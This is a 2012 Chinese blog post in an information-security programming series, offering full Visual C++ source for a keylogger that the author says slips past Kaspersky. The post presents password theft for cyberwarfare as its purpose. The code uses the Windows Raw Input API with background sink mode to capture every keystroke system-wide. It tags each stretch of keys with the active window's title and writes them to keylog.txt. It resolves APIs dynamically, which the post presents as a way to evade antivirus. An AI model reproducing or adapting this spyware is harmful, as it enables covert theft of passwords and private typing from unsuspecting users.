[原]VisualC++信息安全编程（6）穿透卡巴斯基的键盘记录编程

winston · 发表于 2012-3-7 00:11:15

在国家之间的网络战争中，窃取密码是个很重要的事情。
而密码往往是键盘输入的。利用原始设备输入变化RawInput 实现键盘记录，并穿透最牛的杀毒软件卡巴斯基。

引用外国人的原始设备输入变化的类。请柬代码与详细注解。

#ifndef _RAWINPUT_H
#define _RAWINPUT_H
#include <windows.h>
/*
* The input is in the regular message flow,
* the app is required to call DefWindowProc
* so that the system can perform clean ups.
*/
#define RIM_INPUT 0
/*
* The input is sink only. The app is expected
* to behave nicely.
*/
#define RIM_INPUTSINK 1
/*
* Raw Input data header
*/
typedef struct tagRAWINPUTHEADER {
DWORD dwType;
DWORD dwSize;
HANDLE hDevice;
WPARAM wParam;
} RAWINPUTHEADER, *PRAWINPUTHEADER, *LPRAWINPUTHEADER;
/*
* Type of the raw input
*/
#define RIM_TYPEMOUSE 0
#define RIM_TYPEKEYBOARD 1
#define RIM_TYPEHID 2
/*
* Raw format of the mouse input
*/
typedef struct tagRAWMOUSE {
/*
* Indicator flags.
*/
USHORT usFlags;
/*
* The transition state of the mouse buttons.
*/
union {
ULONG ulButtons;
struct {
USHORT usButtonFlags;
USHORT usButtonData;
};
};
/*
* The raw state of the mouse buttons.
*/
ULONG ulRawButtons;
/*
* The signed relative or absolute motion in the X direction.
*/
LONG lLastX;
/*
* The signed relative or absolute motion in the Y direction.
*/
LONG lLastY;
/*
* Device-specific additional information for the event.
*/
ULONG ulExtraInformation;
} RAWMOUSE, *PRAWMOUSE, *LPRAWMOUSE;
/*
* Define the mouse button state indicators.
*/
#define RI_MOUSE_LEFT_BUTTON_DOWN 0x0001 // Left Button changed to down.
#define RI_MOUSE_LEFT_BUTTON_UP 0x0002 // Left Button changed to up.
#define RI_MOUSE_RIGHT_BUTTON_DOWN 0x0004 // Right Button changed to down.
#define RI_MOUSE_RIGHT_BUTTON_UP 0x0008 // Right Button changed to up.
#define RI_MOUSE_MIDDLE_BUTTON_DOWN 0x0010 // Middle Button changed to down.
#define RI_MOUSE_MIDDLE_BUTTON_UP 0x0020 // Middle Button changed to up.
#define RI_MOUSE_BUTTON_1_DOWN RI_MOUSE_LEFT_BUTTON_DOWN
#define RI_MOUSE_BUTTON_1_UP RI_MOUSE_LEFT_BUTTON_UP
#define RI_MOUSE_BUTTON_2_DOWN RI_MOUSE_RIGHT_BUTTON_DOWN
#define RI_MOUSE_BUTTON_2_UP RI_MOUSE_RIGHT_BUTTON_UP
#define RI_MOUSE_BUTTON_3_DOWN RI_MOUSE_MIDDLE_BUTTON_DOWN
#define RI_MOUSE_BUTTON_3_UP RI_MOUSE_MIDDLE_BUTTON_UP
#define RI_MOUSE_BUTTON_4_DOWN 0x0040
#define RI_MOUSE_BUTTON_4_UP 0x0080
#define RI_MOUSE_BUTTON_5_DOWN 0x0100
#define RI_MOUSE_BUTTON_5_UP 0x0200
/*
* If usButtonFlags has RI_MOUSE_WHEEL, the wheel delta is stored in usButtonData.
* Take it as a signed value.
*/
#define RI_MOUSE_WHEEL 0x0400
/*
* Define the mouse indicator flags.
*/
#define MOUSE_MOVE_RELATIVE 0
#define MOUSE_MOVE_ABSOLUTE 1
#define MOUSE_VIRTUAL_DESKTOP 0x02 // the coordinates are mapped to the virtual desktop
#define MOUSE_ATTRIBUTES_CHANGED 0x04 // requery for mouse attributes
/*
* Raw format of the keyboard input
*/
typedef struct tagRAWKEYBOARD {
/*
* The "make" scan code (key depression).
*/
USHORT MakeCode;
/*
* The flags field indicates a "break" (key release) and other
* miscellaneous scan code information defined in ntddkbd.h.
*/
USHORT Flags;
USHORT Reserved;
/*
* Windows message compatible information
*/
USHORT VKey;
UINT Message;
/*
* Device-specific additional information for the event.
*/
ULONG ExtraInformation;
} RAWKEYBOARD, *PRAWKEYBOARD, *LPRAWKEYBOARD;
/*
* Define the keyboard overrun MakeCode.
*/
#define KEYBOARD_OVERRUN_MAKE_CODE 0xFF
/*
* Define the keyboard input data Flags.
*/
#define RI_KEY_MAKE 0
#define RI_KEY_BREAK 1
#define RI_KEY_E0 2
#define RI_KEY_E1 4
#define RI_KEY_TERMSRV_SET_LED 8
#define RI_KEY_TERMSRV_SHADOW 0x10
/*
* Raw format of the input from Human Input Devices
*/
typedef struct tagRAWHID {
DWORD dwSizeHid; // byte size of each report
DWORD dwCount; // number of input packed
BYTE bRawData[1];
} RAWHID, *PRAWHID, *LPRAWHID;
/*
* RAWINPUT data structure.
*/
typedef struct tagRAWINPUT {
RAWINPUTHEADER header;
union {
RAWMOUSE mouse;
RAWKEYBOARD keyboard;
RAWHID hid;
} data;
} RAWINPUT, *PRAWINPUT, *LPRAWINPUT;
/*
* Flags for GetRawInputData
*/
#define RID_INPUT 0x10000003
#define RID_HEADER 0x10000005
typedef struct HRAWINPUT__ * HRAWINPUT;
typedef
UINT
(_stdcall * PGetRawInputData)(
HRAWINPUT hRawInput,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize,
UINT cbSizeHeader
);
/*
* Raw Input Device Information
*/
#define RIDI_PREPARSEDDATA 0x20000005
#define RIDI_DEVICENAME 0x20000007 // the return valus is the character length, not the byte size
#define RIDI_DEVICEINFO 0x2000000b
typedef struct tagRID_DEVICE_INFO_MOUSE {
DWORD dwId;
DWORD dwNumberOfButtons;
DWORD dwSampleRate;
} RID_DEVICE_INFO_MOUSE, *PRID_DEVICE_INFO_MOUSE;
typedef struct tagRID_DEVICE_INFO_KEYBOARD {
DWORD dwType;
DWORD dwSubType;
DWORD dwKeyboardMode;
DWORD dwNumberOfFunctionKeys;
DWORD dwNumberOfIndicators;
DWORD dwNumberOfKeysTotal;
} RID_DEVICE_INFO_KEYBOARD, *PRID_DEVICE_INFO_KEYBOARD;
typedef struct tagRID_DEVICE_INFO_HID {
DWORD dwVendorId;
DWORD dwProductId;
DWORD dwVersionNumber;
/*
* Top level collection UsagePage and Usage
*/
USHORT usUsagePage;
USHORT usUsage;
} RID_DEVICE_INFO_HID, *PRID_DEVICE_INFO_HID;
typedef struct tagRID_DEVICE_INFO {
DWORD cbSize;
DWORD dwType;
union {
RID_DEVICE_INFO_MOUSE mouse;
RID_DEVICE_INFO_KEYBOARD keyboard;
RID_DEVICE_INFO_HID hid;
};
} RID_DEVICE_INFO, *PRID_DEVICE_INFO, *LPRID_DEVICE_INFO;
typedef
UINT
(_stdcall * PGetRawInputDeviceInfoA)(
HANDLE hDevice,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize
);
typedef
UINT
(_stdcall * PGetRawInputDeviceInfoW)(
HANDLE hDevice,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize
);
/*
* Raw Input Bulk Read: GetRawInputBuffer
*/
typedef
UINT
(_stdcall * PGetRawInputBuffer)(
PRAWINPUT pData,
PUINT pcbSize,
UINT cbSizeHeader
);
/*
* Raw Input request APIs
*/
typedef struct tagRAWINPUTDEVICE {
USHORT usUsagePage; // Toplevel collection UsagePage
USHORT usUsage; // Toplevel collection Usage
DWORD dwFlags;
HWND hwndTarget; // Target hwnd. NULL = follows keyboard focus
} RAWINPUTDEVICE, *PRAWINPUTDEVICE, *LPRAWINPUTDEVICE;
typedef CONST RAWINPUTDEVICE* PCRAWINPUTDEVICE;
#define RIDEV_REMOVE 0x00000001
#define RIDEV_EXCLUDE 0x00000010
#define RIDEV_PAGEONLY 0x00000020
#define RIDEV_NOLEGACY 0x00000030
#define RIDEV_INPUTSINK 0x00000100
#define RIDEV_CAPTUREMOUSE 0x00000200 // effective when mouse nolegacy is specified, otherwise it would be an error
#define RIDEV_NOHOTKEYS 0x00000200 // effective for keyboard.
#define RIDEV_APPKEYS 0x00000400 // effective for keyboard.
#define RIDEV_EXMODEMASK 0x000000F0
#define RIDEV_EXMODE(mode) ((mode) & RIDEV_EXMODEMASK)
typedef
BOOL
(_stdcall * PRegisterRawInputDevices)(
PCRAWINPUTDEVICE pRawInputDevices,
UINT uiNumDevices,
UINT cbSize
);
typedef
UINT
(_stdcall * PGetRegisteredRawInputDevices)(
PRAWINPUTDEVICE pRawInputDevices,
PUINT puiNumDevices,
UINT cbSize
);
typedef struct tagRAWINPUTDEVICELIST {
HANDLE hDevice;
DWORD dwType;
} RAWINPUTDEVICELIST, *PRAWINPUTDEVICELIST;
typedef
UINT
(_stdcall * PGetRawInputDeviceList)(
PRAWINPUTDEVICELIST pRawInputDeviceList,
PUINT puiNumDevices,
UINT cbSize);
typedef
LRESULT
(_stdcall * PDefRawInputProc)(
PRAWINPUT *paRawInput,
INT nInput,
UINT cbSizeHeader
);
#define WM_INPUT 0x00ff
#endif
#ifndef _VKEY_H
#define _VKEY_H
struct VKeyInfo{
USHORT VKey;
LPCSTR VKname;
};
#define AddVKey(VK, VKName) {(VK), (VKName)}
static VKeyInfo vkis[] = {
AddVKey(VK_LBUTTON, "Left mouse button"),
AddVKey(VK_RBUTTON, "Right mouse button"),
AddVKey(VK_CANCEL, "Control-break processing"),
AddVKey(0x04, "[Middle mouse button (three-button mouse]"),
AddVKey(0x05, "Windows 2000/XP: X1 mouse button"),
AddVKey(0x06, "Windows 2000/XP: X2 mouse button"),
AddVKey(0x07, "Undefined"),
AddVKey(VK_BACK, "[BACKSPACE]"),
AddVKey(VK_TAB, "[TAB]"),
AddVKey(0x0A, "Reserved"),
AddVKey(0x0B, "Reserved"),
AddVKey(VK_CLEAR, "[CLEAR]"),
AddVKey(VK_RETURN, "[ENTER]"),
AddVKey(0x0E, "Undefined"),
AddVKey(0x0F, "Undefined"),
AddVKey(VK_SHIFT, "[SHIFT]"),
AddVKey(VK_CONTROL, "[CTRL]"),
AddVKey(VK_MENU, "[ALT]"),
AddVKey(VK_PAUSE, "[PAUSE]"),
AddVKey(VK_CAPITAL, "[caps lock]"),
AddVKey(VK_KANA, "Input Method Editor (IME) Kana mode"),
AddVKey(VK_HANGUL, "IME Hangul mode"),
AddVKey(0x16, "Undefined"),
AddVKey(VK_JUNJA, "IME Junja mode"),
AddVKey(VK_FINAL, "IME final mode"),
AddVKey(VK_HANJA, "IME Hanja mode"),
AddVKey(VK_KANJI, "IME Kanji mode"),
AddVKey(0x1A, "Undefined"),
AddVKey(VK_ESCAPE, "[ESC]"),
AddVKey(VK_CONVERT, "IME convert"),
AddVKey(VK_NONCONVERT, "IME nonconvert"),
AddVKey(VK_ACCEPT, "IME accept"),
AddVKey(VK_MODECHANGE, "IME mode change request"),
AddVKey(VK_SPACE, "[space]"),
AddVKey(VK_PRIOR, "[PAGE UP]"),
AddVKey(VK_NEXT, "[PAGE DOWN]"),
AddVKey(VK_END, "[END]"),
AddVKey(VK_HOME, "[HOME]"),
AddVKey(VK_LEFT, "[LEFT ARROW]"),
AddVKey(VK_UP, "[UP ARROW]"),
AddVKey(VK_RIGHT, "[RIGHT ARROW]"),
AddVKey(VK_DOWN, "[DOWN ARROW]"),
AddVKey(VK_SELECT, "[SELECT]"),
AddVKey(VK_PRINT, "[PRINT]"),
AddVKey(VK_EXECUTE, "[EXECUTE]"),
AddVKey(VK_SNAPSHOT, "[PRINT SCREEN]"),
AddVKey(VK_INSERT, "[INSERT]"),
AddVKey(VK_DELETE, "[DEL]"),
AddVKey(VK_HELP, "[HELP]"),
AddVKey(0x30, "0"),
AddVKey(0x31, "1"),
AddVKey(0x32, "2"),
AddVKey(0x33, "3"),
AddVKey(0x34, "4"),
AddVKey(0x35, "5"),
AddVKey(0x36, "6"),
AddVKey(0x37, "7"),
AddVKey(0x38, "8"),
AddVKey(0x39, "9"),
AddVKey(0x3A, "Undefined"),
AddVKey(0x3B, "Undefined"),
AddVKey(0x3C, "Undefined"),
AddVKey(0x3D, "Undefined"),
AddVKey(0x3E, "Undefined"),
AddVKey(0x3F, "Undefined"),
AddVKey(0x40, "Undefined"),
AddVKey(0x41, "a"),
AddVKey(0x42, "b"),
AddVKey(0x43, "c"),
AddVKey(0x44, "d"),
AddVKey(0x45, "e"),
AddVKey(0x46, "f"),
AddVKey(0x47, "g"),
AddVKey(0x48, "h"),
AddVKey(0x49, "i"),
AddVKey(0x4A, "j"),
AddVKey(0x4B, "k"),
AddVKey(0x4C, "l"),
AddVKey(0x4D, "m"),
AddVKey(0x4E, "n"),
AddVKey(0x4F, "o"),
AddVKey(0x50, "p"),
AddVKey(0x51, "q"),
AddVKey(0x52, "r"),
AddVKey(0x53, "s"),
AddVKey(0x54, "t"),
AddVKey(0x55, "u"),
AddVKey(0x56, "v"),
AddVKey(0x57, "w"),
AddVKey(0x58, "x"),
AddVKey(0x59, "y"),
AddVKey(0x5A, "z"),
AddVKey(VK_LWIN, "Left Windows key (Microsoft Natural keyboard)"),
AddVKey(VK_RWIN, "Right Windows key (Natural keyboard)"),
AddVKey(VK_APPS, "Applications key (Natural keyboard)"),
AddVKey(0x5E, "Reserved"),
AddVKey(VK_SLEEP, "Computer Sleep key"),
AddVKey(VK_NUMPAD0, "Numeric keypad 0 key"),
AddVKey(VK_NUMPAD1, "Numeric keypad 1 key"),
AddVKey(VK_NUMPAD2, "Numeric keypad 2 key"),
AddVKey(VK_NUMPAD3, "Numeric keypad 3 key"),
AddVKey(VK_NUMPAD4, "Numeric keypad 4 key"),
AddVKey(VK_NUMPAD5, "Numeric keypad 5 key"),
AddVKey(VK_NUMPAD6, "Numeric keypad 6 key"),
AddVKey(VK_NUMPAD7, "Numeric keypad 7 key"),
AddVKey(VK_NUMPAD8, "Numeric keypad 8 key"),
AddVKey(VK_NUMPAD9, "Numeric keypad 9 key"),
AddVKey(VK_MULTIPLY, "Multiply key"),
AddVKey(VK_ADD, "Add key"),
AddVKey(VK_SEPARATOR, "Separator key"),
AddVKey(VK_SUBTRACT, "Subtract key"),
AddVKey(VK_DECIMAL, "Decimal key"),
AddVKey(VK_DIVIDE, "Divide key"),
AddVKey(VK_F1, "[F1]"),
AddVKey(VK_F2, "[F2]"),
AddVKey(VK_F3, "[F3]"),
AddVKey(VK_F4, "[F4]"),
AddVKey(VK_F5, "[F5]"),
AddVKey(VK_F6, "[F6]"),
AddVKey(VK_F7, "[F7]"),
AddVKey(VK_F8, "[F8]"),
AddVKey(VK_F9, "[F9]"),
AddVKey(VK_F10, "[F10]"),
AddVKey(VK_F11, "[F11]"),
AddVKey(VK_F12, "[F12]"),
AddVKey(VK_F13, "[F13]"),
AddVKey(VK_F14, "[F14]"),
AddVKey(VK_F15, "[F15]"),
AddVKey(VK_F16, "[F16]"),
AddVKey(VK_F17, "[F17]"),
AddVKey(VK_F18, "[F18]"),
AddVKey(VK_F19, "[F19]"),
AddVKey(VK_F20, "[F20]"),
AddVKey(VK_F21, "[F21]"),
AddVKey(VK_F22, "[F22]"),
AddVKey(VK_F23, "[F23]"),
AddVKey(VK_F24, "[F24]"),
AddVKey(0x88, "Unassigned"),
AddVKey(0x89, "Unassigned"),
AddVKey(0x8A, "Unassigned"),
AddVKey(0x8B, "Unassigned"),
AddVKey(0x8C, "Unassigned"),
AddVKey(0x8D, "Unassigned"),
AddVKey(0x8E, "Unassigned"),
AddVKey(0x8F, "Unassigned"),
AddVKey(VK_NUMLOCK, "[NUM LOCK]"),
AddVKey(VK_SCROLL, "[SCROLL LOCK]"),
AddVKey(0x92, "OEM specific"),
AddVKey(0x93, "OEM specific"),
AddVKey(0x94, "OEM specific"),
AddVKey(0x95, "OEM specific"),
AddVKey(0x96, "OEM specific"),
AddVKey(0x97, "Unassigned"),
AddVKey(0x98, "Unassigned"),
AddVKey(0x99, "Unassigned"),
AddVKey(0x9A, "Unassigned"),
AddVKey(0x9B, "Unassigned"),
AddVKey(0x9C, "Unassigned"),
AddVKey(0x9D, "Unassigned"),
AddVKey(0x9E, "Unassigned"),
AddVKey(0x9F, "Unassigned"),
AddVKey(VK_LSHIFT, "[Left SHIFT ]"),
AddVKey(VK_RSHIFT, "[Right SHIFT]"),
AddVKey(VK_LCONTROL, "[Left CONTROL]"),
AddVKey(VK_RCONTROL, "[Right CONTROL]"),
AddVKey(VK_LMENU, "Left MENU key"),
AddVKey(VK_RMENU, "Right MENU key"),
AddVKey(0xA6, "Windows 2000/XP: Browser Back key"),
AddVKey(0xA7, "Windows 2000/XP: Browser Forward key"),
AddVKey(0xA8, "Windows 2000/XP: Browser Refresh key"),
AddVKey(0xA9, "Windows 2000/XP: Browser Stop key"),
AddVKey(0xAA, "Windows 2000/XP: Browser Search key"),
AddVKey(0xAB, "Windows 2000/XP: Browser Favorites key"),
AddVKey(0xAC, "Windows 2000/XP: Browser Start and Home key"),
AddVKey(0xAD, "Windows 2000/XP: Volume Mute key"),
AddVKey(0xAE, "Windows 2000/XP: Volume Down key"),
AddVKey(0xAF, "Windows 2000/XP: Volume Up key"),
AddVKey(0xB0, "Windows 2000/XP: Next Track key"),
AddVKey(0xB1, "Windows 2000/XP: Previous Track key"),
AddVKey(0xB2, "Windows 2000/XP: Stop Media key"),
AddVKey(0xB3, "Windows 2000/XP: Play/Pause Media key"),
AddVKey(0xB4, "Windows 2000/XP: Start Mail key"),
AddVKey(0xB5, "Windows 2000/XP: Select Media key"),
AddVKey(0xB6, "Windows 2000/XP: Start Application 1 key"),
AddVKey(0xB7, "Windows 2000/XP: Start Application 2 key"),
AddVKey(0xB8, "Reserved"),
AddVKey(0xB9, "Reserved"),
AddVKey(VK_OEM_1, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \';:\' key"),
AddVKey(VK_OEM_PLUS, "Windows 2000/XP: For any country/region, the \'+\' key"),
AddVKey(VK_OEM_COMMA, "Windows 2000/XP: For any country/region, the \',\' key"),
AddVKey(VK_OEM_MINUS, "Windows 2000/XP: For any country/region, the \'-\' key"),
AddVKey(VK_OEM_PERIOD, "Windows 2000/XP: For any country/region, the \'.\' key"),
AddVKey(VK_OEM_2, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \'/?\' key"),
AddVKey(VK_OEM_3, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \'`~\' key"),
AddVKey(0xC1, "Reserved"),
AddVKey(0xC2, "Reserved"),
AddVKey(0xC3, "Reserved"),
AddVKey(0xC4, "Reserved"),
AddVKey(0xC5, "Reserved"),
AddVKey(0xC6, "Reserved"),
AddVKey(0xC7, "Reserved"),
AddVKey(0xC8, "Reserved"),
AddVKey(0xC9, "Reserved"),
AddVKey(0xCA, "Reserved"),
AddVKey(0xCB, "Reserved"),
AddVKey(0xCC, "Reserved"),
AddVKey(0xCD, "Reserved"),
AddVKey(0xCE, "Reserved"),
AddVKey(0xCF, "Reserved"),
AddVKey(0xD0, "Reserved"),
AddVKey(0xD1, "Reserved"),
AddVKey(0xD2, "Reserved"),
AddVKey(0xD3, "Reserved"),
AddVKey(0xD4, "Reserved"),
AddVKey(0xD5, "Reserved"),
AddVKey(0xD6, "Reserved"),
AddVKey(0xD7, "Reserved"),
AddVKey(0xD8, "Unassigned"),
AddVKey(0xD9, "Unassigned"),
AddVKey(0xDA, "Unassigned"),
AddVKey(VK_OEM_4, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \'[{\' key"),
AddVKey(VK_OEM_5, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \'\\|\' key"),
AddVKey(VK_OEM_6, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \']}\' key"),
AddVKey(VK_OEM_7, "Used for miscellaneous characters; it can vary by keyboard."
"Windows 2000/XP: For the US standard keyboard, the \'single-quote/double-quote\' key"),
AddVKey(VK_OEM_8, "Used for miscellaneous characters; it can vary by keyboard."),
AddVKey(0xE0, "Reserved"),
AddVKey(0xE1, "OEM specific"),
AddVKey(VK_OEM_102, "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard"),
AddVKey(0xE3, "OEM specific"),
AddVKey(0xE4, "OEM specific"),
AddVKey(VK_PROCESSKEY, "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key"),
AddVKey(0xE6, "OEM specific"),
AddVKey(0xE7, "Windows 2000/XP: Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods. For more information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP"),
AddVKey(0xE8, "Unassigned"),
AddVKey(0xE9, "OEM specific"),
AddVKey(0xEA, "OEM specific"),
AddVKey(0xEB, "OEM specific"),
AddVKey(0xEC, "OEM specific"),
AddVKey(0xED, "OEM specific"),
AddVKey(0xEF, "OEM specific"),
AddVKey(0xF0, "OEM specific"),
AddVKey(0xF1, "OEM specific"),
AddVKey(0xF2, "OEM specific"),
AddVKey(0xF3, "OEM specific"),
AddVKey(0xF4, "OEM specific"),
AddVKey(0xF5, "OEM specific"),
AddVKey(VK_ATTN, "Attn key"),
AddVKey(VK_CRSEL, "CrSel key"),
AddVKey(VK_EXSEL, "ExSel key"),
AddVKey(VK_EREOF, "Erase EOF key"),
AddVKey(VK_PLAY, "Play key"),
AddVKey(VK_ZOOM, "Zoom key"),
AddVKey(VK_NONAME, "Reserved"),
AddVKey(VK_PA1, "PA1 key"),
AddVKey(VK_OEM_CLEAR, "Clear key"),
AddVKey(0xFF, "Unknown Virtual-Key Code")
};
LPCSTR GetKeyName(USHORT VKey)
{
for(int i = 0; i < sizeof(vkis); i++)
{
if(VKey == vkis[i].VKey)
return vkis[i].VKname;
}
return vkis[--i].VKname;
}
#endif
实现过程如下，在应用程序中调用之。
#include "rawinput.h"
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
HANDLE InitLogFile(void);
bool Intial(HINSTANCE hInstance);
BOOL RegisitKeyBord(HWND hwnd);
PVOID GetApiAdd(LPCSTR dllname, LPCSTR procname);
HWND prev = NULL;
HANDLE hFile;
char *szInfo = "一个穿透卡巴的键盘记录（带窗口标题获取）利用原始设备输入变化RawInput 键盘记录在当前目录下的Keylog.txt中";
char *szTips = http://blog.csdn.net/yincheng01;
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE,PSTR,int iCmdShow)
{
MSG msg;
Intial(hInstance);
while(GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}
bool Intial(HINSTANCE hInstance)
{
HWND hWnd;
WNDCLASS wndClass;
wndClass.style = CS_HREDRAW | CS_VREDRAW;
wndClass.lpfnWndProc = WndProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = hInstance;
wndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
wndClass.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
wndClass.lpszMenuName = NULL;
wndClass.lpszClassName = TEXT("Twnd");
RegisterClass(&wndClass);
hWnd = CreateWindow(
TEXT("Twnd"), // window class name
TEXT("键盘记录测试"), // window caption
WS_OVERLAPPEDWINDOW, // window style
CW_USEDEFAULT, // initial x position
CW_USEDEFAULT, // initial y position
CW_USEDEFAULT, // initial x size
CW_USEDEFAULT, // initial y size
NULL, // parent window handle
NULL, // window menu handle
hInstance, // program instance handle
NULL); // creation parameters
//将键盘记录写入日志文件
hFile = InitLogFile();
if(!RegisitKeyBord(hWnd))
return 0;
ShowWindow(hWnd, SW_SHOW);
UpdateWindow(hWnd);
return 0;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
HDC hdc;
PAINTSTRUCT ps;
char vk[256] = {'\0'};
char ti[256] = {'\0'};
UINT dwSize;
LPBYTE lpb = NULL;
RAWINPUT* raw = NULL;
DWORD dwWritten = 0;
PGetRawInputData GetRawInputData = (PGetRawInputData)GetApiAdd("user32.dll", "GetRawInputData");
switch(message)
{
case WM_INPUT:
if(NULL == GetRawInputData)
{
DefWindowProc(hWnd, message, wParam, lParam);
return 0;
}
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));
lpb = new BYTE[dwSize];
if(lpb == NULL)
{
DefWindowProc(hWnd, message, wParam, lParam);
return 0;
}
if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, lpb, &dwSize, sizeof(RAWINPUTHEADER)) != dwSize)
break;
raw = (RAWINPUT*)lpb;
if (raw->header.dwType == RIM_TYPEKEYBOARD)
{
if ( prev == NULL)
{
prev = GetForegroundWindow();
GetWindowText(prev,ti,256);
wsprintf(vk,"[%s]\r\n%s",&ti,GetKeyName(raw->data.keyboard.VKey));
}
else if ( prev == GetForegroundWindow() )
{
wsprintf(vk,"%s",GetKeyName(raw->data.keyboard.VKey));
}
else
{
prev = GetForegroundWindow();
GetWindowText(prev,ti,256);
wsprintf(vk,"\r\n\r\n[%s]\r\n%s",&ti,GetKeyName(raw->data.keyboard.VKey));
}
if(hFile != INVALID_HANDLE_VALUE && ((WM_KEYDOWN == raw->data.keyboard.Message) || (WM_SYSKEYDOWN == raw->data.keyboard.Message)))
{
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, vk, (DWORD)strlen(vk), &dwWritten, NULL);
}
}
delete[] lpb;
DefWindowProc(hWnd, message, wParam, lParam);
return 0;
case WM_PAINT:
hdc = BeginPaint(hWnd, &ps);
TextOut(hdc, 10, 10, szInfo, strlen(szInfo));
TextOut(hdc, 10, 30, szTips, strlen(szTips));
EndPaint(hWnd, &ps);
return 0;
case WM_DESTROY:
PostQuitMessage(0);
CloseHandle(hFile);
return 0;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
}
HANDLE InitLogFile(void)
{
HANDLE hFile = CreateFile("keylog.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
return hFile;
}
PVOID GetApiAdd(LPCSTR dllname, LPCSTR procname)
{
HMODULE hDll = LoadLibraryA(dllname);
if(NULL == hDll)
return NULL;
PVOID pProc = GetProcAddress(hDll, procname);
FreeLibrary(hDll);
return pProc;
}
BOOL RegisitKeyBord(HWND hwnd)
{
if(NULL == hwnd)
return false;
PRegisterRawInputDevices RegisterRawInputDevices = (PRegisterRawInputDevices)GetApiAdd("User32.dll", "RegisterRawInputDevices");
if(NULL == RegisterRawInputDevices)
return false;
RAWINPUTDEVICE rid;
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hwnd;
return RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE));
}

复制代码

作者：yincheng01 发表于2012-1-7 0:33:44 原文链接

		自动登录	找回密码
密码			用户注册